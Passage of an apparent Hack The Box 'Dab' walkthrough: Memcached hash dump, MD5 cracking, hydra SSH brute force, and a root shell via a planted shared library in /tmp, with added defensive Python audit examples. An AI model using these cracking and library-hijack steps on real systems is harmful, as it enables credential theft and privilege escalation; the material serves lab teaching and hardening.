000009: C=200 14 L 27 W 303 Ch ")"
000010: C=200 14 L 27 W 303 Ch "*"
000005: C=200 14 L 27 W 303 Ch "%"
000006: C=200 14 L 25 W 287 Ch "&"
000012: C=200 14 L 27 W 303 Ch ","
000013: C=200 14 L 27 W 303 Ch "-"
000014: C=200 14 L 27 W 303 Ch "."
000015: C=200 14 L 27 W 303 Ch "/"
000026: C=200 14 L 27 W 303 Ch ":"
000027: C=200 14 L 27 W 303 Ch ";"
000028: C=200 14 L 27 W 303 Ch "<"
000029: C=200 14 L 27 W 303 Ch "="
000030: C=200 14 L 27 W 303 Ch ">"
000032: C=200 14 L 27 W 303 Ch "@"
000031: C=200 14 L 27 W 303 Ch "?"
000059: C=200 14 L 27 W 303 Ch "["
000060: C=200 14 L 27 W 303 Ch "\"
000062: C=200 14 L 27 W 303 Ch "^"
000061: C=200 14 L 27 W 303 Ch "]"
000063: C=200 14 L 27 W 303 Ch "_"
000064: C=200 14 L 27 W 303 Ch "`"
000091: C=200 14 L 27 W 303 Ch "{"
000092: C=200 14 L 27 W 303 Ch "|"
000093: C=200 14 L 27 W 303 Ch "}"
000094: C=200 14 L 27 W 303 Ch "~"
000095: C=200 14 L 25 W 287 Ch ""

Total time: 0.789136
Processed Requests: 95
Filtered Requests: 63
Requests/sec.: 120.3847

Now that we have the Memcached version, we try to find the users stored on the server by sending the command “get users” to port 11211.

After running the command, we successfully obtain the usernames and password hashes stored on the Memcached server.

We copy the usernames and hashes from the web page into a text file so that we can use John the Ripper to crack them.

john --format=raw-md5 --show user2.txt > cracked.txt

After cracking the password, we use the saved file to brute-force SSH login using hydra and find the correct credentials to be “genevieve: Princess1”.

hydra -C cracked.txt ssh://10.10.10.86 -t4
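The cache dump and the raw-md5 cracking above come down to two things: an unauthenticated key-value store reachable through a proxy endpoint, and password hashes stored as bare, unsalted MD5 so that one hash call per candidate is all it takes. As an added example (my own code, not the box's application), the block below parses a memcached text-protocol "get" reply the way a client must (checking the declared byte count rather than trusting it), classifies the stored hashes, shows how cheap a single candidate check is against raw MD5, and puts the salted, slow PBKDF2 alternative from the standard library next to it. The reply bytes are constructed; the value being a JSON object of username to hash is an assumption.

```python
import hashlib
import hmac
import json
import os
import re

# Constructed memcached reply to "get users" (not the box's data). The value is assumed to be
# a JSON object of username -> hash; the hashes are MD5 of "password" and "123456".
SAMPLE_VALUE = b'{"alice": "5f4dcc3b5aa765d61d8327deb882cf99", "bob": "e10adc3949ba59abbe56e057f20f883e"}'
SAMPLE_REPLY = b"VALUE users 0 %d\r\n%s\r\nEND\r\n" % (len(SAMPLE_VALUE), SAMPLE_VALUE)


def parse_get_reply(raw):
    """Parse a memcached text-protocol 'get' reply into {key: value_bytes}.

    Wire format: 'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n' repeated, then 'END\\r\\n'.
    The declared byte count is only trusted after checking that a CRLF follows the data."""
    items, pos = {}, 0
    while True:
        nl = raw.index(b"\r\n", pos)
        header = raw[pos:nl]
        if header == b"END":
            return items
        parts = header.split()
        if len(parts) < 4 or parts[0] != b"VALUE":
            raise ValueError("unexpected line: %r" % header)
        key, length = parts[1].decode(), int(parts[3])
        data_start = nl + 2
        if raw[data_start + length:data_start + length + 2] != b"\r\n":
            raise ValueError("declared length does not match data for key %r" % key)
        items[key] = raw[data_start:data_start + length]
        pos = data_start + length + 2


HEX32 = re.compile(r"^[0-9a-f]{32}$")


def classify_hash(h):
    """A bare 32-hex string with no salt or scheme prefix is almost always raw MD5."""
    return "raw-md5" if HEX32.match(h) else "unknown"


def load_users(raw):
    """Usernames and hashes exactly as the cache stores them."""
    return json.loads(parse_get_reply(raw)["users"].decode())


def md5_matches(candidate, digest):
    """One unsalted hash call per candidate: no salt, no work factor, trivially parallel."""
    return hmac.compare_digest(hashlib.md5(candidate.encode()).hexdigest(), digest)


def pbkdf2_hash(password, iterations=200_000):
    """Salted, slow replacement using only the standard library."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def pbkdf2_verify(password, stored):
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for user, h in load_users(SAMPLE_REPLY).items():
        print(user, h, classify_hash(h))
```

Two fixes follow from the example: the cache should never hold verifiers at all (bind memcached to localhost and keep the socket endpoint from reaching it, or better, do not expose such an endpoint), and whatever does hold them should use a salted, iterated scheme so that a dump does not turn into a working SSH password list within seconds.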

Now we use these credentials to log in through SSH. After logging in we find a file called “user.txt”, which contains our first flag.

root@kali:~/htb/dab# ssh genevieve@10.10.10.86
genevieve@10.10.10.86's password: Princess1
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-133-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Mar 26 23:42:41 2018 from 172.23.10.99
genevieve@dab:~$ ls
user.txt
genevieve@dab:~$ cat user.txt
9bc*****2b1

We now search for files with the SUID bit set and find an application called “myexec”.

genevieve@dab:~$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/ping
/bin/ping6
/bin/su
/bin/ntfs-3g
/bin/fusermount
/bin/mount
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/myexec
/usr/bin/pkexec
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/sbin/ldconfig
/sbin/ldconfig.real

We run the application and find that it asks for a password.

We use ltrace to recover the password the application compares against.

When we run it under ltrace again with the correct password, we find that a function the application calls is missing, i.e. the library that should provide it is not present.

We identify the shared library the application expects and check “/etc/ld.so.conf.d/test.conf” to find where the dynamic linker will look for it; the directory listed there is “/tmp”.

We now write a C program that executes “/bin/bash” and place it in the /tmp directory.

#include <stdlib.h>   /* system(); the original omitted this header, hence the implicit-declaration warning below */
#include <unistd.h>   /* setuid(), setgid() */

/* Exported under the name myexec expects. The library is dropped in /tmp, which
   /etc/ld.so.conf.d/test.conf adds to the dynamic linker's search path. */
void seclogin()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}

We compile it as a shared library.

genevieve@dab:/tmp$ gcc -shared -fPIC -o libseclogin.so libseclogin.c
libseclogin.c: In function ‘seclogin’:
libseclogin.c:6:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
system("/bin/bash");
^
genevieve@dab:/tmp$ ls
libseclogin.c libseclogin.so systemd-private-878abaa780d9451ca3a9b312f4979967-systemd-timesyncd.service-u6R6Yx vmware-root

Now that we are inside the /tmp directory, we refresh the shared library cache with “ldconfig”. Then, when we run the application and give it the correct password, we get a bash shell as the root user. We move to the /root directory and find a file called “root.txt”; its content is the final flag.

genevieve@dab:/tmp$ ldconfig
genevieve@dab:/tmp$ /usr/bin/myexec
Enter password: s3cur3l0g1n
Password is correct

root@dab:/# cd /root
root@dab:/root# cat root.txt 
45c*****a98e
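The root of this privilege escalation is a configuration fact, not a code bug: a world-writable directory listed in /etc/ld.so.conf.d/ becomes a trusted library source for every program on the system, including setuid ones, which ignore LD_PRELOAD and LD_LIBRARY_PATH precisely to avoid this. The audit below is an added example of mine, not something from the box: it parses ld.so.conf-style files, stats each listed directory and flags any that are world-writable or not owned by root. The demo builds a temporary stand-in for /etc/ld.so.conf.d with a test.conf pointing at a 1777 directory, mirroring the box; pointing audit_conf_dir at the real /etc/ld.so.conf.d is the intended use.

```python
import glob
import os
import stat
import tempfile


def parse_ld_conf(text):
    """Return the directories listed in an ld.so.conf-style file; comments and blanks skipped."""
    dirs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line and not line.startswith("include "):  # 'include' globs are not followed here
            dirs.append(line)
    return dirs


def audit_search_dir(path):
    """Verdict for one loader search directory.

    'world-writable' or 'not-root-owned' means any local user can plant a library there, and
    because ld.so.conf directories are trusted system-wide, a setuid program whose library is
    not found earlier in the search order will load the planted copy."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "missing"
    if not stat.S_ISDIR(st.st_mode):
        return "not-a-directory"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_uid != 0:
        return "not-root-owned"
    return "ok"


def audit_conf_dir(conf_dir):
    """Audit every *.conf under conf_dir (e.g. /etc/ld.so.conf.d); returns {(conf, dir): verdict}."""
    results = {}
    for conf in sorted(glob.glob(os.path.join(conf_dir, "*.conf"))):
        with open(conf) as fh:
            for d in parse_ld_conf(fh.read()):
                results[(os.path.basename(conf), d)] = audit_search_dir(d)
    return results


def build_demo():
    """Constructed stand-in for the box: a conf dir whose test.conf points at a 1777 directory."""
    root = tempfile.mkdtemp(prefix="ldaudit-")
    conf_dir = os.path.join(root, "ld.so.conf.d")
    os.mkdir(conf_dir)
    sticky_dir = os.path.join(root, "tmp")  # plays the role of /tmp
    os.mkdir(sticky_dir)
    os.chmod(sticky_dir, 0o1777)
    with open(os.path.join(conf_dir, "test.conf"), "w") as fh:
        fh.write("# added for testing\n%s\n" % sticky_dir)
    with open(os.path.join(conf_dir, "libc.conf"), "w") as fh:
        fh.write("/usr/local/lib\n")
    return conf_dir, sticky_dir


if __name__ == "__main__":
    conf_dir, sticky_dir = build_demo()
    for (conf, d), verdict in audit_conf_dir(conf_dir).items():
        print(f"{conf}: {d}: {verdict}")
```

A non-"ok" verdict for any directory is a finding on its own; the fix is to remove the entry (or make the directory root-owned and 0755) and rerun ldconfig, and a setuid binary that needs a private library should have it installed under a root-owned path rather than a development convenience like /tmp.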

Author: Jacco Straathof